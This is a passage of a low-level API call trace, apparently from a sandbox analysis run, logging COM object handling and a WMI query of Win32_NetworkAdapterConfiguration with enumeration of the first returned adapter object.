riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26df60 | out: ppvObject=0x26df60*=0x73ffa4) returned 0x0 [0194.687] WbemLocator:IRpcOptions:Query (in: This=0x73ffa4, pPrx=0x73ffbc, dwProperty=2, pdwValue=0x26df88 | out: pdwValue=0x26df88) returned 0x80004002 [0194.687] WbemLocator:IUnknown:Release (This=0x73ffa4) returned 0x3 [0194.687] WbemLocator:IUnknown:Release (This=0x73ffbc) returned 0x2 [0194.687] CoGetContextToken (in: pToken=0x26e4a8 | out: pToken=0x26e4a8) returned 0x0 [0194.687] CoGetContextToken (in: pToken=0x26e408 | out: pToken=0x26e408) returned 0x0 [0194.687] WbemLocator:IUnknown:QueryInterface (in: This=0x73ffbc, riid=0x26e4d8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x26e4d4 | out: ppvObject=0x26e4d4*=0x521cbdc) returned 0x0 [0194.687] WbemLocator:IUnknown:AddRef (This=0x521cbdc) returned 0x4 [0194.688] WbemLocator:IUnknown:Release (This=0x521cbdc) returned 0x3 [0194.688] WbemLocator:IUnknown:Release (This=0x521cbdc) returned 0x2 [0194.688] SysStringLen (param_1=0x0) returned 0x0 [0194.688] CoGetContextToken (in: pToken=0x26e4a0 | out: pToken=0x26e4a0) returned 0x0 [0194.688] WbemLocator:IUnknown:AddRef (This=0x73ffbc) returned 0x3 [0194.688] WbemLocator:IUnknown:QueryInterface (in: This=0x73ffbc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e334 | out: ppvObject=0x26e334*=0x73ffbc) returned 0x0 [0194.688] WbemLocator:IUnknown:Release (This=0x73ffbc) returned 0x3 [0194.688] WbemLocator:IUnknown:Release (This=0x73ffbc) returned 0x2 [0194.688] CoGetContextToken (in: pToken=0x26e570 | out: pToken=0x26e570) returned 0x0 [0194.688] WbemLocator:IUnknown:AddRef (This=0x521cbdc) returned 0x3 [0194.688] IWbemServices:ExecQuery (in: This=0x521cbdc, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_NetworkAdapterConfiguration ", lFlags=16, pCtx=0x0, ppEnum=0x26e7a4 | out: ppEnum=0x26e7a4*=0x521089c) returned 0x0 [0197.381] IUnknown:QueryInterface (in: This=0x521089c, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e5e4 | out: ppvObject=0x26e5e4*=0x52108a0) returned 0x0 [0197.382] IClientSecurity:QueryBlanket (in: This=0x52108a0, pProxy=0x521089c, pAuthnSvc=0x26e634, pAuthzSvc=0x26e630, pServerPrincName=0x26e628, pAuthnLevel=0x26e62c, pImpLevel=0x26e61c, pAuthInfo=0x26e620, pCapabilites=0x26e624 | out: pAuthnSvc=0x26e634*=0xa, pAuthzSvc=0x26e630*=0x0, pServerPrincName=0x26e628, pAuthnLevel=0x26e62c*=0x6, pImpLevel=0x26e61c*=0x2, pAuthInfo=0x26e620, pCapabilites=0x26e624*=0x1) returned 0x0 [0197.382] IUnknown:Release (This=0x52108a0) returned 0x1 [0197.382] IUnknown:QueryInterface (in: This=0x521089c, riid=0x752410f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e5d8 | out: ppvObject=0x26e5d8*=0x73fecc) returned 0x0 [0197.382] IUnknown:QueryInterface (in: This=0x521089c, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e5d4 | out: ppvObject=0x26e5d4*=0x52108a0) returned 0x0 [0197.382] IClientSecurity:SetBlanket (This=0x52108a0, pProxy=0x521089c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0197.460] IUnknown:Release (This=0x52108a0) returned 0x2 [0197.460] WbemLocator:IUnknown:Release (This=0x73fecc) returned 0x1 [0197.460] CoTaskMemFree (pv=0x700db8) [0197.460] IUnknown:QueryInterface (in: This=0x521089c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e1d0 | out: ppvObject=0x26e1d0*=0x73fecc) returned 0x0 [0197.460] WbemLocator:IUnknown:QueryInterface (in: This=0x73fecc, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26e18c | out: ppvObject=0x26e18c*=0x0) returned 0x80004002 [0197.461] WbemLocator:IUnknown:QueryInterface (in: This=0x73fecc, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dfac | out: ppvObject=0x26dfac*=0x0) returned 0x80004002 [0197.461] WbemLocator:IUnknown:AddRef (This=0x73fecc) returned 0x3 [0197.461] WbemLocator:IUnknown:QueryInterface (in: This=0x73fecc, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26daec | out: ppvObject=0x26daec*=0x0) returned 0x80004002 [0197.461] WbemLocator:IUnknown:QueryInterface (in: This=0x73fecc, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26da9c | out: ppvObject=0x26da9c*=0x0) returned 0x80004002 [0197.462] WbemLocator:IUnknown:QueryInterface (in: This=0x73fecc, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26daa8 | out: ppvObject=0x26daa8*=0x73fe2c) returned 0x0 [0197.462] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x73fe2c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26dab0 | out: pCid=0x26dab0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.462] WbemLocator:IUnknown:Release (This=0x73fe2c) returned 0x3 [0197.462] CoGetContextToken (in: pToken=0x26db08 | out: pToken=0x26db08) returned 0x0 [0197.462] CoGetContextToken (in: pToken=0x26df10 | out: pToken=0x26df10) returned 0x0 [0197.462] WbemLocator:IUnknown:QueryInterface (in: This=0x73fecc, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfa0 | out: ppvObject=0x26dfa0*=0x73feb4) returned 0x0 [0197.462] WbemLocator:IRpcOptions:Query (in: This=0x73feb4, pPrx=0x73fecc, dwProperty=2, pdwValue=0x26dfc8 | out: pdwValue=0x26dfc8) returned 0x80004002 [0197.462] WbemLocator:IUnknown:Release (This=0x73feb4) returned 0x3 [0197.462] WbemLocator:IUnknown:Release (This=0x73fecc) returned 0x2 [0197.462] CoGetContextToken (in: pToken=0x26e4e0 | out: pToken=0x26e4e0) returned 0x0 [0197.462] CoGetContextToken (in: pToken=0x26e440 | out: pToken=0x26e440) returned 0x0 [0197.462] WbemLocator:IUnknown:QueryInterface (in: This=0x73fecc, riid=0x26e510*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x26e50c | out: ppvObject=0x26e50c*=0x521089c) returned 0x0 [0197.462] IUnknown:AddRef (This=0x521089c) returned 0x4 [0197.462] IUnknown:Release (This=0x521089c) returned 0x3 [0197.462] IUnknown:Release (This=0x521089c) returned 0x2 [0197.462] WbemLocator:IUnknown:Release (This=0x521cbdc) returned 0x2 [0197.462] SysStringLen (param_1=0x0) returned 0x0 [0197.462] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7f0 | out: puCount=0x26e7f0*=0x2) returned 0x0 [0197.462] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7ec*=0x0, pszText=0x0 | out: puBuffLength=0x26e7ec*=0xf, pszText=0x0) returned 0x0 [0197.463] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.463] CoGetContextToken (in: pToken=0x26e640 | out: pToken=0x26e640) returned 0x0 [0197.463] IUnknown:AddRef (This=0x521089c) returned 0x3 [0197.463] IEnumWbemClassObject:Clone (in: This=0x521089c, ppEnum=0x26e7fc | out: ppEnum=0x26e7fc*=0x5210bbc) returned 0x0 [0197.464] IUnknown:QueryInterface (in: This=0x5210bbc, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e6c0 | out: ppvObject=0x26e6c0*=0x5210bc0) returned 0x0 [0197.464] IClientSecurity:QueryBlanket (in: This=0x5210bc0, pProxy=0x5210bbc, pAuthnSvc=0x26e710, pAuthzSvc=0x26e70c, pServerPrincName=0x26e704, pAuthnLevel=0x26e708, pImpLevel=0x26e6f8, pAuthInfo=0x26e6fc, pCapabilites=0x26e700 | out: pAuthnSvc=0x26e710*=0xa, pAuthzSvc=0x26e70c*=0x0, pServerPrincName=0x26e704, pAuthnLevel=0x26e708*=0x6, pImpLevel=0x26e6f8*=0x2, pAuthInfo=0x26e6fc, pCapabilites=0x26e700*=0x1) returned 0x0 [0197.464] IUnknown:Release (This=0x5210bc0) returned 0x1 [0197.464] IUnknown:QueryInterface (in: This=0x5210bbc, riid=0x752410f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e6b4 | out: ppvObject=0x26e6b4*=0x74046c) returned 0x0 [0197.464] IUnknown:QueryInterface (in: This=0x5210bbc, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e6b0 | out: ppvObject=0x26e6b0*=0x5210bc0) returned 0x0 [0197.464] IClientSecurity:SetBlanket (This=0x5210bc0, pProxy=0x5210bbc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0197.465] IUnknown:Release (This=0x5210bc0) returned 0x2 [0197.465] WbemLocator:IUnknown:Release (This=0x74046c) returned 0x1 [0197.465] CoTaskMemFree (pv=0x700f08) [0197.465] IUnknown:QueryInterface (in: This=0x5210bbc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e29c | out: ppvObject=0x26e29c*=0x74046c) returned 0x0 [0197.465] WbemLocator:IUnknown:QueryInterface (in: This=0x74046c, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26e258 | out: ppvObject=0x26e258*=0x0) returned 0x80004002 [0197.466] WbemLocator:IUnknown:QueryInterface (in: This=0x74046c, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e074 | out: ppvObject=0x26e074*=0x0) returned 0x80004002 [0197.466] WbemLocator:IUnknown:AddRef (This=0x74046c) returned 0x3 [0197.466] WbemLocator:IUnknown:QueryInterface (in: This=0x74046c, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26dbb4 | out: ppvObject=0x26dbb4*=0x0) returned 0x80004002 [0197.466] WbemLocator:IUnknown:QueryInterface (in: This=0x74046c, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26db64 | out: ppvObject=0x26db64*=0x0) returned 0x80004002 [0197.467] WbemLocator:IUnknown:QueryInterface (in: This=0x74046c, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26db70 | out: ppvObject=0x26db70*=0x7403cc) returned 0x0 [0197.467] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7403cc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26db78 | out: pCid=0x26db78*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.467] WbemLocator:IUnknown:Release (This=0x7403cc) returned 0x3 [0197.467] CoGetContextToken (in: pToken=0x26dbd0 | out: pToken=0x26dbd0) returned 0x0 [0197.467] CoGetContextToken (in: pToken=0x26dfd8 | out: pToken=0x26dfd8) returned 0x0 [0197.467] WbemLocator:IUnknown:QueryInterface (in: This=0x74046c, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e068 | out: ppvObject=0x26e068*=0x740454) returned 0x0 [0197.467] WbemLocator:IRpcOptions:Query (in: This=0x740454, pPrx=0x74046c, dwProperty=2, pdwValue=0x26e090 | out: pdwValue=0x26e090) returned 0x80004002 [0197.467] WbemLocator:IUnknown:Release (This=0x740454) returned 0x3 [0197.467] WbemLocator:IUnknown:Release (This=0x74046c) returned 0x2 [0197.467] CoGetContextToken (in: pToken=0x26e5b0 | out: pToken=0x26e5b0) returned 0x0 [0197.467] CoGetContextToken (in: pToken=0x26e510 | out: pToken=0x26e510) returned 0x0 [0197.467] WbemLocator:IUnknown:QueryInterface (in: This=0x74046c, riid=0x26e5e0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x26e5dc | out: ppvObject=0x26e5dc*=0x5210bbc) returned 0x0 [0197.467] IUnknown:AddRef (This=0x5210bbc) returned 0x4 [0197.467] IUnknown:Release (This=0x5210bbc) returned 0x3 [0197.467] IUnknown:Release (This=0x5210bbc) returned 0x2 [0197.467] IUnknown:Release (This=0x521089c) returned 0x2 [0197.467] SysStringLen (param_1=0x0) returned 0x0 [0197.467] IEnumWbemClassObject:Reset (This=0x5210bbc) returned 0x0 [0197.468] CoTaskMemAlloc (cb=0x4) returned 0x717620 [0197.468] IEnumWbemClassObject:Next (in: This=0x5210bbc, lTimeout=-1, uCount=0x1, apObjects=0x717620, puReturned=0x2576450 | out: apObjects=0x717620*=0x5228d78, puReturned=0x2576450*=0x1) returned 0x0 [0197.571] IUnknown:QueryInterface (in: This=0x5228d78, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26de60 | out: ppvObject=0x26de60*=0x5228d78) returned 0x0 [0197.572] IUnknown:QueryInterface (in: This=0x5228d78, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26de1c | out: ppvObject=0x26de1c*=0x0) returned 0x80004002 [0197.572] IUnknown:QueryInterface (in: This=0x5228d78, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dc3c | out: ppvObject=0x26dc3c*=0x0) returned 0x80004002 [0197.572] IUnknown:AddRef (This=0x5228d78) returned 0x3 [0197.572] IUnknown:QueryInterface (in: This=0x5228d78, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d77c | out: ppvObject=0x26d77c*=0x0) returned 0x80004002 [0197.572] IUnknown:QueryInterface (in: This=0x5228d78, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d72c | out: ppvObject=0x26d72c*=0x0) returned 0x80004002 [0197.572] IUnknown:QueryInterface (in: This=0x5228d78, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d738 | out: ppvObject=0x26d738*=0x5228d7c) returned 0x0 [0197.572] IMarshal:GetUnmarshalClass (in: This=0x5228d7c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d740 | out: pCid=0x26d740*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0197.572] IUnknown:Release (This=0x5228d7c) returned 0x3 [0197.572] CoGetContextToken (in: pToken=0x26d798 | out: pToken=0x26d798) returned 0x0 [0197.572] CoGetContextToken (in: pToken=0x26dba0 | out: pToken=0x26dba0) returned 0x0 [0197.572] IUnknown:QueryInterface (in: This=0x5228d78, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dc30 | out: ppvObject=0x26dc30*=0x0) returned 0x80004002 [0197.572] IUnknown:Release (This=0x5228d78) returned 0x2 [0197.572] CoGetContextToken (in: pToken=0x26e170 | out: pToken=0x26e170) returned 0x0 [0197.572] CoGetContextToken (in: pToken=0x26e0d0 | out: pToken=0x26e0d0) returned 0x0 [0197.573] IUnknown:QueryInterface (in: This=0x5228d78, riid=0x26e1a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26e19c | out: ppvObject=0x26e19c*=0x5228d78) returned 0x0 [0197.573] IUnknown:AddRef (This=0x5228d78) returned 0x4 [0197.573] IUnknown:Release (This=0x5228d78) returned 0x3 [0197.573] IUnknown:Release (This=0x5228d78) returned 0x2 [0197.573] CoTaskMemFree (pv=0x717620) [0197.573] CoGetContextToken (in: pToken=0x26e4d8 | out: pToken=0x26e4d8) returned 0x0 [0197.573] IUnknown:AddRef (This=0x5228d78) returned 0x3 [0197.573] IWbemClassObject:Get (in: This=0x5228d78, wszName="__GENUS", lFlags=0, pVal=0x26e7ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e86c*=0, plFlavor=0x26e868*=0 | out: pVal=0x26e7ec*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x26e86c*=3, plFlavor=0x26e868*=64) returned 0x0 [0197.573] IWbemClassObject:Get (in: This=0x5228d78, wszName="__PATH", lFlags=0, pVal=0x26e7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e854*=0, plFlavor=0x26e850*=0 | out: pVal=0x26e7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0", varVal2=0x0), pType=0x26e854*=8, plFlavor=0x26e850*=64) returned 0x0 [0197.573] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0") returned 0x80 [0197.573] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0") returned 0x80 [0197.573] CoGetObjectContext (in: riid=0x224f510*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e7fc | out: ppv=0x26e7fc*=0x6ded34) returned 0x0 [0197.573] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26e7f4 | out: pAptType=0x26e7f4*=1) returned 0x0 [0197.573] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x224f4f8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26e7f8 | out: ppvObject=0x26e7f8*=0x0) returned 0x80004002 [0197.573] IUnknown:Release (This=0x6ded34) returned 0x1 [0197.575] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e168 | out: ppv=0x26e168*=0x5210a10) returned 0x0 [0197.575] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210a10, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e380 | out: ppvObject=0x26e380*=0x0) returned 0x80004002 [0197.575] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5210a10, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e394 | out: ppvObject=0x26e394*=0x521cbf0) returned 0x0 [0197.575] WbemDefPath:IUnknown:Release (This=0x5210a10) returned 0x0 [0197.575] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cbf0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfb4 | out: ppvObject=0x26dfb4*=0x521cbf0) returned 0x0 [0197.575] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cbf0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26df70 | out: ppvObject=0x26df70*=0x0) returned 0x80004002 [0197.575] WbemDefPath:IUnknown:AddRef (This=0x521cbf0) returned 0x3 [0197.575] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cbf0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d8cc | out: ppvObject=0x26d8cc*=0x0) returned 0x80004002 [0197.575] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cbf0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d87c | out: ppvObject=0x26d87c*=0x0) returned 0x80004002 [0197.575] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cbf0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d888 | out: ppvObject=0x26d888*=0x717620) returned 0x0 [0197.576] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x717620, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d890 | out: pCid=0x26d890*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.576] WbemDefPath:IUnknown:Release (This=0x717620) returned 0x3 [0197.576] CoGetContextToken (in: pToken=0x26d8e8 | out: pToken=0x26d8e8) returned 0x0 [0197.576] CoGetContextToken (in: pToken=0x26dcf0 | out: pToken=0x26dcf0) returned 0x0 [0197.576] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cbf0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dd80 | out: ppvObject=0x26dd80*=0x0) returned 0x80004002 [0197.576] WbemDefPath:IUnknown:Release (This=0x521cbf0) returned 0x2 [0197.576] WbemDefPath:IUnknown:Release (This=0x521cbf0) returned 0x1 